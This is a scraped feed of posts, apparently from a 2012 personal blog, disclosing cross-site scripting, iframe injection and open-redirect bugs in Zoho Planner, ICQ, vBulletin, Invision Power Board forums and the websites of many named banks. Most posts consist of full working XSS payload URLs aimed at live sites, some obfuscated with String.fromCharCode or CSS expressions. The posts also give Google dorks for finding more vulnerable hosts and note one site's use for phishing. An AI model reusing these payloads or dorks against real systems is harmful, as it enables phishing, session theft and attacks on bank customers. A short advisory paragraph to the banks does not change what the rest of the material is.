http://community.invisionpower.com/index.php?s=blablabla&&app=gallery&module=ajax§ion=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E<br />
<br />
<b>You can't see this. Create your bug in the gallery and you can see this.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-X0zz0Cat4cM/T3HCBFh43JI/AAAAAAAAA4w/oEXQRrPRWv8/s1600/IPSEARCHGALLERY.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-X0zz0Cat4cM/T3HCBFh43JI/AAAAAAAAA4w/oEXQRrPRWv8/s400/IPSEARCHGALLERY.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-NXBr12I1PSk/T3HE4krdAII/AAAAAAAAA48/PC1i0JjRxPM/s1600/test.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-NXBr12I1PSk/T3HE4krdAII/AAAAAAAAA48/PC1i0JjRxPM/s400/test.JPG" /></a></div><br />
<br />
<b>Video PoC:</b><br />
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/y29v74xp6t0" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>What about other version? Maybe..</b>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-26679270717934017092012-03-26T10:09:00.000-10:002012-03-26T10:09:57.287-10:00My Funny QuoteIn the Yahoo Messenger..<br />
<br />
<blockquote>[12:33] b0rntek: i want think<br />
[12:33] b0rntek: about bugs<br />
[12:33] b0rntek: what the best<br />
[12:33] b0rntek: my real life<br />
[12:34] b0rntek: or life with computer and bugs<br />
[12:34] b0rntek: i want made choice<br />
<br />
bla bla bla<br />
<br />
[12:43] b0rntek: i want made other important things etc in my life)<br />
[12:44] No One: and what exactly are these so "importnant" tings for wich you talk about?<br />
[12:46] b0rntek: put important things is right site, not an important things in the left side<br />
[12:47] No One: ohhh ...first i saw this-"put important things is right site " 0.o((((((((((((:</blockquote><br />
DJ b0rntek: <br />
<br />
<blockquote>put important things is right site</blockquote><br />
<blockquote>important things</blockquote><br />
<blockquote>is right site</blockquote><br />
<blockquote>site</blockquote><br />
<blockquote>site</blockquote><br />
<blockquote>site</blockquote><br />
<i>Does anyone! I need a doctor!</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://s19.rimg.info/a4c3b95c7e65a537156e1cbe5d8c4a47.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="43" width="35" src="http://s19.rimg.info/a4c3b95c7e65a537156e1cbe5d8c4a47.gif" /></a></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com2tag:blogger.com,1999:blog-791799492554981317.post-91806073270741223172012-03-26T02:20:00.010-10:002012-03-26T09:35:40.106-10:00IFrame Injection/Cross Site Scripting Zoho Planner<b># Exploit Title: IFrame Injection/Cross Site Scripting Zoho Planner<br />
# Date: 26.03.2012<br />
# Author: Sony and Flexxpoint</b><br />
<b># Software Link:</b> https://planner.zoho.com/login.do<br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Blog Flexxpoint:</b> http://flexxpoint.blogspot.com/<br />
<b># Blog Sony:</b> http://st2tea.blogspot.com<br />
<b># Site :</b> http://insecurity.ro<br />
<b># PoC:</b><br />
http://st2tea.blogspot.com/2012/03/iframe-injection-zoho-planner.html<br />
<b>..................................................................</b><br />
<br />
<b>Well, we have simple IFrame Injection in Zoho Planner. A lot of fields in Planner vuln to IFrame Injection. <br />
<br />
Some pics:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TeEgX-Bolyo/T3BbmuhsWfI/AAAAAAAAA3o/GZ44l0hxilA/s1600/planner.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-TeEgX-Bolyo/T3BbmuhsWfI/AAAAAAAAA3o/GZ44l0hxilA/s400/planner.JPG" /></a></div><br />
<b>And we can share this page:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-kDhbFNr4Bts/T3BcA6qb9nI/AAAAAAAAA30/eAVwUeu0qSs/s1600/page.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-kDhbFNr4Bts/T3BcA6qb9nI/AAAAAAAAA30/eAVwUeu0qSs/s400/page.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cKc87zx7Jp8/T3BdPwYeq8I/AAAAAAAAA4A/brbijHo-R9U/s1600/zz.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-cKc87zx7Jp8/T3BdPwYeq8I/AAAAAAAAA4A/brbijHo-R9U/s400/zz.JPG" /></a></div><br />
<b>Links:</b><br />
<br />
https://planner.zoho.com/public/9cFPJ%2B9AHivFeKtB5e%2B2xnTSQcOn7WCf<br />
<br />
https://planner.zoho.com/public/9cFPJ%2B9AHivFeKtB5e%2B2xq%2BYywariZ7J<br />
<br />
<b>Video PoC: (simple)</b><br />
<br />
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/gUlby00Ai04" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>and Cross Site Scripting:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img62.imageshack.us/img62/9804/screenshot2732012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="695" width="823" src="http://img62.imageshack.us/img62/9804/screenshot2732012.png" /></a></div><br />
<b>Persistent XSS.</b><br />
<br />
https://planner.zoho.com/public/umYocnKNsn3FeKtB5e%2B2xkj3SVhWUBnO<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-xqLeppn0Ljg/T3CtpbHOpiI/AAAAAAAAA4Y/qtSl4YKOP34/s1600/persistent.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-xqLeppn0Ljg/T3CtpbHOpiI/AAAAAAAAA4Y/qtSl4YKOP34/s400/persistent.JPG" /></a></div><br />
https://planner.zoho.com/public/umYocnKNsn3FeKtB5e%2B2xnTSQcOn7WCf<br />
<br />
<b>p.s. Iframe Injection we can see in the Bugtracker Zoho (change status).</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ui927W7TCcE/T3BjV8cgG3I/AAAAAAAAA4M/0wq-pZCAGAc/s1600/zoho-status.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-ui927W7TCcE/T3BjV8cgG3I/AAAAAAAAA4M/0wq-pZCAGAc/s400/zoho-status.JPG" /></a></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-25830667167609954582012-03-24T16:43:00.001-10:002012-03-24T16:45:24.320-10:00ICQ.com Cross Site Scripting<b># Date: 25.03.2012<br />
# Author: Sony and Flexxpoint<br />
# Web Browser : Mozilla Firefox<br />
# Sony Blog: http://st2tea.blogspot.com<br />
# Flexxpoint Blog: http://flexxpoint.blogspot.com/<br />
..................................................................<br />
<br />
Good Place for XSS.</b><br />
<br />
http://validate.icq.com/icq/validate.html?uid=1%22%3E%3Cscript%3Ealert%28%22Sony%20and%20Flexxpoint%22%29%3C/script%3E&sid=23&lang=en<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-QzodBisslBU/T26GDHl_TFI/AAAAAAAAA2g/AxIb_cY8ZNk/s1600/icq1.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-QzodBisslBU/T26GDHl_TFI/AAAAAAAAA2g/AxIb_cY8ZNk/s400/icq1.JPG" /></a></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-10656292471383220902012-03-24T16:05:00.019-10:002012-03-26T06:52:38.960-10:00vBulletin 3.8.x - 4.1.11 Cross Site Scripting<b># Exploit Title: vBulletin 3.8.x - 4.1.11 Cross Site Scripting<br />
# Date: 25.03.2012<br />
# Author: Sony , Flexxpoint and .e0f<br />
# Software Link: https://www.vbulletin.com/<br />
# Web Browser : Mozilla Firefox<br />
# Blog Flexxpoint: http://flexxpoint.blogspot.com/<br />
# Blog Sony: http://st2tea.blogspot.com<br />
# Site : http://insecurity.ro<br />
..................................................................</b><br />
<br />
<b>Well, we have an interesting xss in vBulletin 4.1.10 - 4.1.11 (maybe other version)<br />
<br />
We have xss in the a lot of places.</b><br />
<br />
https://www.vbulletin.com/forum/blog.php<br />
https://www.vbulletin.com/forum/<br />
https://www.vbulletin.com/forum/group.php<br />
<b>etc..</b><br />
<br />
<br />
<b>Simple Example:</b><br />
<br />
https://www.vbulletin.com/forum/group.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-BGr5Gpx3hcU/T25sVUwAXOI/AAAAAAAAA1k/ZMIHWQ33RJM/s1600/demo.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="195" width="400" src="http://2.bp.blogspot.com/-BGr5Gpx3hcU/T25sVUwAXOI/AAAAAAAAA1k/ZMIHWQ33RJM/s400/demo.JPG" /></a></div><br />
<b>Click on URL and put our xss code in the URL:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-u4MX7TvWS0I/T25tETfkJCI/AAAAAAAAA1w/eCYX2ANJAC8/s1600/demo2.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="248" width="400" src="http://2.bp.blogspot.com/-u4MX7TvWS0I/T25tETfkJCI/AAAAAAAAA1w/eCYX2ANJAC8/s400/demo2.JPG" /></a></div><br />
<b>And press button Ok and button Preview Message.<br />
</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Nu2V0B8a9X8/T25ueP3feZI/AAAAAAAAA18/PzTyykhnRsA/s1600/demo3.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-Nu2V0B8a9X8/T25ueP3feZI/AAAAAAAAA18/PzTyykhnRsA/s400/demo3.JPG" /></a></div><br />
<b>We can see xss. It's in all places, where we can use "url". <br />
<br />
How you can use this? idk..<br />
<br />
But i know what you can use..<br />
<br />
Create new topic, put our xss in the "url" and click on Promote to Article..</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jjoVibvT6Jc/T25w8Y44ihI/AAAAAAAAA2I/49o61qj0-Go/s1600/pr.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-jjoVibvT6Jc/T25w8Y44ihI/AAAAAAAAA2I/49o61qj0-Go/s400/pr.JPG" /></a></div><br />
<b>or Blog this Post..</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Z1d0eiIjvAw/T25xa3qvmyI/AAAAAAAAA2U/mzmP5SU3qTA/s1600/blog.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-Z1d0eiIjvAw/T25xa3qvmyI/AAAAAAAAA2U/mzmP5SU3qTA/s400/blog.JPG" /></a></div><br />
<b>It's a hard, but possibly.<br />
<br />
Simple Video PoC:</b><br />
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/endyyK1rW4k" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>Or example on</b> http://www.chinclub.ru/forum.php<br />
<br />
http://www.chinclub.ru/showthread.php?p=<b>257153</b><br />
<br />
<b>(It's topic) You can create other with xss (for example).<br />
<br />
But we need give other link for users or admin ..(link Blog this Post)</b><br />
<br />
http://www.chinclub.ru/blog_post.php?do=newblog&p=<b>257153</b><br />
<br />
<b>And here we can see our persistent xss and..hmm..<br />
<br />
We test this on some forums. It's work. <br />
<br />
Demo vBulletin Forum. Version 4.1.10.</b><br />
<br />
https://www.vbulletin.com/admindemo.php<br />
<br />
<b>It's Work in other version too. </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Vxg5RZhIn_A/T28jy2jP4LI/AAAAAAAAA3E/TIxEYwKp8TE/s1600/go.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-Vxg5RZhIn_A/T28jy2jP4LI/AAAAAAAAA3E/TIxEYwKp8TE/s400/go.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8xNUvB6bK6k/T28nFoaKuqI/AAAAAAAAA3c/sSsGRohMD6w/s1600/goha.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-8xNUvB6bK6k/T28nFoaKuqI/AAAAAAAAA3c/sSsGRohMD6w/s400/goha.JPG" /></a></div><br />
<br />
<b>And..<br />
<br />
Today i saw one clip by .e0f, it's too about vBulletin:<br />
<br />
http://vimeo.com/39049790<br />
<br />
Method is very interesting. It's not in "url".<br />
<br />
We can see is here:<br />
<br />
http://www.1337day.com/exploits/17824?utm_source=dlvr.it&utm_medium=twitter<br />
</b><br />
<br />
<iframe src="http://player.vimeo.com/video/39049790?title=0&byline=0&portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe><p><a href="http://vimeo.com/39049790">vBulletin 4.1.10 XSS Vulnerability 2x</a> from <a href="http://vimeo.com/user10972566">root and toor</a> on <a href="http://vimeo.com">Vimeo</a>.</p>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-83482636567715644742012-03-24T06:04:00.014-10:002012-03-24T23:30:22.669-10:00Invision Power Board 3.1.x -3.2.x Cross Site Scripting<b># Exploit Title: Invision Power Board 3.1.x -3.2.x Cross Site Scripting<br />
# Date: 24.03.2012<br />
# Author: Flexxpoint and Sony<br />
# Software Link: http://www.invisionpower.com/products/board/<br />
# Web Browser : Mozilla Firefox<br />
# Blog Flexxpoint : http://flexxpoint.blogspot.com/<br />
# Blog Sony : http://st2tea.blogspot.com/<br />
# Site : http://insecurity.ro<br />
..................................................................<br />
<br />
Well, we have an interesting xss in Invision Power Board. But i can not say which versions 100% may be vulnerable.<br />
<br />
Personal Messenger-->Compose New-Other Recipients=our xss code. Press Button Preview or Send Message.<br />
<br />
Webmoney. </b><br />
<br />
http://forum.webmoney.ru/<br />
<br />
http://forum.webmoney.ru/index.php?app=members&module=messaging§ion=send&do=send<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jerfXHt98eI/T23S5UxlciI/AAAAAAAAA0o/p40B3Cu0UA8/s1600/webmoney.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-jerfXHt98eI/T23S5UxlciI/AAAAAAAAA0o/p40B3Cu0UA8/s400/webmoney.JPG" /></a></div><br />
<b>DrWeb.</b><br />
<br />
http://forum.drweb.com/index.php?<br />
<br />
http://forum.drweb.com/index.php?app=members&module=messaging§ion=send&do=send<br />
<br />
http://forum.drweb.com/index.php?app=members&module=messaging<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xgtveL5DBsQ/T23UCaBmt0I/AAAAAAAAA00/8AY-QqBjPJQ/s1600/drweb.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-xgtveL5DBsQ/T23UCaBmt0I/AAAAAAAAA00/8AY-QqBjPJQ/s400/drweb.JPG" /></a></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img861.imageshack.us/img861/989/screenshot2532012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="683" width="864" src="http://img861.imageshack.us/img861/989/screenshot2532012.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img718.imageshack.us/img718/989/screenshot2532012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="673" width="849" src="http://img718.imageshack.us/img718/989/screenshot2532012.png" /></a></div><br />
<br />
<br />
<br />
<b>This is just another XSS hole that was fixed from Invision Power on 14.03.2012 but still exist in dr.Web's forum because they just used a un-patched software at the moment of writing on this post.</b><br />
<br />
<br />
<b>Pcworld.com<br />
(IP.Board 3.1.4) <br />
</b><br />
http://forums.pcworld.com/index.php?app=members&module=messaging§ion=send&do=send<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-X334E6HGOR4/T23YVksxdoI/AAAAAAAAA1A/Q8JSLWcqI0Y/s1600/pcworld.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-X334E6HGOR4/T23YVksxdoI/AAAAAAAAA1A/Q8JSLWcqI0Y/s400/pcworld.JPG" /></a></div><br />
<b>Governmentsecurity.org<br />
</b><br />
http://www.governmentsecurity.org/forum/index.php?app=members&module=messaging§ion=send&do=send<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cWkC9_5n1RM/T23cc5kVSZI/AAAAAAAAA1M/TbLI0RGCZ_E/s1600/sec.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-cWkC9_5n1RM/T23cc5kVSZI/AAAAAAAAA1M/TbLI0RGCZ_E/s400/sec.JPG" /></a></div><br />
<b>etc..a lot of web sites..<br />
<br />
This is not a critical bug,but it's a bug....</b>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-20866618083446567012012-03-21T11:17:00.011-10:002012-03-22T07:29:35.462-10:00Various Banks Cross Site Scripting<b># Title: Various Banks Cross Site Scripting<br />
# Author: Sony and Flexxpoint<br />
# Data: 21.03.2012<br />
# Sony Blog: http://st2tea.blogspot.com<br />
# Flexxpoint Blog : http://flexxpoint.blogspot.com/<br />
# Site: http://insecurity.ro</b><br />
<br />
<b>We staged an experiment out of interest. We looked through several randomly selected websites of Worlds banks to check them for vulnerabilities. This was done rather quick even without any specialized software. The results were not surprising. We will demonstrate different bugs of the same type.<br />
<br />
Demo:</b><br />
<br />
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://insecurity.ro<br />
<br />
<b>Good redirect in bitrix:<br />
<br />
inurl:bitrix/rk.php</b><br />
<br />
<br />
<b>http://www.citizensbank.com/ <br />
(U.S.)<br />
<br />
Simple (in the Search)</b><br />
<br />
http://www.citizensbank.com/search/?query=Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s1600/citiz.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s400/citiz.JPG" /></a></div><br />
<br />
<b>https://www.wellsfargo.com/<br />
(U.S.)<br />
<br />
http://codepad.org/inXkWxYw</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s1600/well.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s400/well.JPG" /></a></div><br />
<br />
<b>http://www.eximb.com<br />
(Ukraine)</b><br />
<br />
http://www.eximb.com/rus/personal/everyday/internet_banking/?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s1600/ukr.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s400/ukr.JPG" /></a></div><br />
<br />
<b>http://procreditbank.bg/main/bg/index.php<br />
(Bulgaria)</b><br />
<br />
https://probanking.procreditbank.bg/regist/default.asp?password2=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s1600/bg.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s400/bg.JPG" /></a></div><br />
http://www.sbrf.ru<br />
(Russia)<br />
<br />
http://www.sbrf.ru/moscow/ru/quotes/metals/timeline/index.php?qid190=1%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FmhxD8hklgc/T2thGdbrbKI/AAAAAAAAA0U/V_E_q1uMoXw/s1600/sberbank.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-FmhxD8hklgc/T2thGdbrbKI/AAAAAAAAA0U/V_E_q1uMoXw/s400/sberbank.JPG" /></a></div><br />
<br />
<br />
<b>http://www.vtb24.ru<br />
(Russia)</b><br />
<br />
http://www.vtb24.ru/news/Pages/nizhnij-tagil.aspx?year=2012&category=%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s1600/vtb24.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s400/vtb24.JPG" /></a></div><br />
<b>http://www.homecredit.ru/<br />
(Russia)<br />
<br />
https://online.homecredit.ru/ChatApp/login.jsp<br />
<br />
or..<br />
<br />
https://online.homecredit.ru/ChatApp/Chat/HtmlChatFrameSet.jsp<br />
<br />
We have a html code injection in the chat.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s1600/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s400/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG" /></a></div><br />
<b>http://www.mastercardpremium.ru<br />
(Russia, but not a official site, but good for xss phishing attack)<br />
<br />
Simple.</b><br />
<br />
http://www.mastercardpremium.ru/search?phrase=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s1600/master.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s400/master.JPG" /></a></div><br />
<br />
<b>http://www.raiffeisen.ch/web/home_de<br />
(Switzerland)</b><br />
<br />
http://www.raiffeisen.ch/raiffeisen/internet/rb0027.nsf/fAskForDeletionFile?ReadForm&File=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s1600/1a.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s400/1a.JPG" /></a></div><br />
<br />
<br />
http://boerse.raiffeisen.ch/raiffeisen2/listings/intraday.jsp?listing=998089,4,1&name=SM%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s1600/2a.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s400/2a.JPG" /></a></div><br />
<br />
<br />
<b>http://www.uwcfs.com/<br />
(Czech Republic)<br />
<br />
XSS in Chat. And we can see:<br />
<br />
http://www1.migbank.com/<br />
<br />
https://www.msufcu.org/<br />
<br />
Google Dorks: inurl:/phplive/message_box.php?theme=<br />
<br />
1 bug = a lot of web sites.</b>.<br />
<br />
https://secure.moneypolo.cz/phplive/message_box.php?theme=&l=admin&x=1&deptid=1%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s1600/internetbank.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s400/internetbank.JPG" /></a><br />
</div><br />
<br />
<b>http://www.bcb.gob.bo/index.php<br />
(Bolivia)<br />
(but work only on old IE versions,and IE related browsers-Maxton,Green..etc)</b><br />
<br />
http://www.bcb.gob.bo/index.php?q=%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20&combos1_1=1&combos1_2=1&combos1_3=1&combos1_4=1&combos1_5=1&combos1_6=1&combos1_7=1&combos1_8=1&combos1_9=1&subcateg1=1&Submit=Buscar<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img29.imageshack.us/img29/4543/screenshot2232012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="722" width="811" src="http://img29.imageshack.us/img29/4543/screenshot2232012.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s1600/bolivia.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s400/bolivia.JPG" /></a></div><br />
<br />
<br />
<b>We would like to add a few words about security. There's no need to panic, perfect security just isn't possible, though we should try to come as close as possible. We would like to give a couple of advices for these banks. They should certainly pay more attention to their IT personnel's competence and discipline, spend their money not only on market research, but also on penetration testing, organize penetration testers' contests like Google and Facebook do or possible have their own staff of penetration testers. The bank personnel should be tested for their vulnerability to social engineering. These are just the basics.</b>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com2tag:blogger.com,1999:blog-791799492554981317.post-81697747609588820832012-03-20T00:30:00.001-10:002012-03-20T00:31:15.070-10:00devianART Cross Site Scripting<b>Simple.<br />
<br />
